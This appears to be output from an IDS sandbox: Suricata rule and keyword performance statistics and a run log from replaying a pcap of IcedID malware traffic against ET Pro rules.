  102      2020181      1        8        40083        0.05   1        0        40083       40083.00    0.00        40083.00   
  103      2023670      1        3        39149        0.05   1        1        39149       39149.00    39149.00    0.00       
  104      2022547      1        1        301451       0.40   85       0        39149       3546.48     0.00        3546.48    
  105      2018358      1        7        38617        0.05   1        0        38617       38617.00    0.00        38617.00   
  106      2014471      1        6        38520        0.05   1        0        38520       38520.00    0.00        38520.00   
  107      2819694      1        2        93853        0.13   5        0        38402       18770.60    0.00        18770.60   
  108      2021954      1        2        37967        0.05   1        1        37967       37967.00    37967.00    0.00       
  109      2816327      1        4        105350       0.14   3        0        37774       35116.67    0.00        35116.67   
  110      2804508      1        2        37708        0.05   1        0        37708       37708.00    0.00        37708.00   
  111      2815156      1        2        37530        0.05   1        0        37530       37530.00    0.00        37530.00   
  112      2022051      1        2        37404        0.05   1        1        37404       37404.00    37404.00    0.00       
  113      2805985      1        2        37368        0.05   1        0        37368       37368.00    0.00        37368.00   
  114      2024829      1        2        187887       0.25   8        0        37296       23485.88    0.00        23485.88   
  115      2021718      1        4        37243        0.05   1        0        37243       37243.00    0.00        37243.00   
  116      2023875      1        2        37098        0.05   1        0        37098       37098.00    0.00        37098.00   
  117      2816895      1        2        37037        0.05   1        0        37037       37037.00    0.00        37037.00   
  118      2024771      1        1        796021       1.06   157      0        36711       5070.20     0.00        5070.20    
  119      2828122      1        2        36434        0.05   1        0        36434       36434.00    0.00        36434.00   
  120      2816660      1        3        36287        0.05   1        0        36287       36287.00    0.00        36287.00   
  121      2827575      1        2        95443        0.13   3        0        36217       31814.33    0.00        31814.33   
  122      2016029      1        3        36166        0.05   1        0        36166       36166.00    0.00        36166.00   
  123      2022270      1        2        36110        0.05   1        0        36110       36110.00    0.00        36110.00   
  124      2821471      1        2        36107        0.05   1        0        36107       36107.00    0.00        36107.00   
  125      2021068      1        2        3

This file has been truncated.


keyword_perf.log - (18061 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/24/2019 -- 11:52:53
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             3022221         983             983             33423           3074.00         3074.00         0.00           
  content          15911557        2530            1140            2556849         6289.00         5844.00         6654.00        
  pcre             1206471         276             117             33782           4371.00         4113.00         4561.00        
  byte_test        556700          178             81              21038           3127.00         3502.00         2814.00        
  byte_jump        4487973         32              25              4371548         140249.00       177679.00       6570.00        
  isdataat         27822           10              1               2883            2782.00         2883.00         2771.00        
  flowbits         840800          285             50              20787           2950.00         3104.00         2917.00        
  urilen           290142          91              22              4592            3188.00         3279.00         3159.00        
  byte_extract     225789          81              56              4054            2787.00         2807.00         2742.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             3022221         983             983             33423           3074.00         3074.00         0.00           
  flowbits         795296          274             39              20787           2902.00         2813.00         2917.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7840469         1840            741             111160          4261.00         4569.00         4053.00        
  pcre             477034          140             86              18508           3407.00         3308.00         3564.00        
  byte_test        556700          178             81              21038           3127.00         3502.00         2814.00        
  byte_jump        86650           21              14              25701           4126.00         2904.00         6570.00        
  isdataat         27822           10              1               2883            2782.00         2883.00         2771.00        
  byte_extract     225789          81              56              4054            2787.00         2807.00         2742.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         45504           11              11              6368            4136.00         4136.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          429827          114             73              5020            3770.00         3847.00         3632.00        
  pcre             321192          55              10              20832           5839.00         5807.00         5846.00        
  urilen           290142          91              22              4592            3188.00         3279.00         3159.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6698            2               2               4096            3349.00         3349.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7328            2               0               3899            3664.00         0.00            3664.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6192349         212             84              2556849         29209.00        23761.00        32784.00       
  pcre             176748          45              0               7470            3927.00         0.00            3927.00        
  byte_jump        4401323         11              11              4371548         400120.00       400120.00       0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          946068          223             154             63225           4242.00         4416.00         3854.00        
  pcre             180450          26              13              33782           6940.00         7933.00         5947.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          111265          32              24              4549            3477.00         3514.00         3364.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7080            2               2               3678            3540.00         3540.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept_enc
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6738            2               2               3470            3369.00         3369.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          11007           3               2               3997            3669.00         3505.00         3997.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_start
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3365            1               1               3365            3365.00         3365.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3599            1               0               3599            3599.00         0.00            3599.00        
  pcre             9473            1               0               9473            9473.00         0.00            9473.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          81865           21              11              15396           3898.00         3492.00         4344.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          154528          40              26              5222            3863.00         4087.00         3445.00        
  pcre             26025           6               6               5531            4337.00         4337.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          15936           5               5               3527            3187.00         3187.00         0.00           
  pcre             15549           3               2               6084            5183.00         4732.00         6084.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3785            1               0               3785            3785.00         0.00            3785.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       

This file has been truncated.


IDSDeathBlossom.py.log - (1190 bytes) - download
2019-01-24 11:52:31,257 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-24 11:52:31,960 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-24 11:52:31,960 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-24 11:52:31,960 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-24 11:52:31,960 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-24 11:52:31,961 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/6771a04700e519a87e61a9e8fa2a592156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap -vvv -k none
2019-01-24 11:52:53,249 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-24 11:52:53,250 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 22.0005831718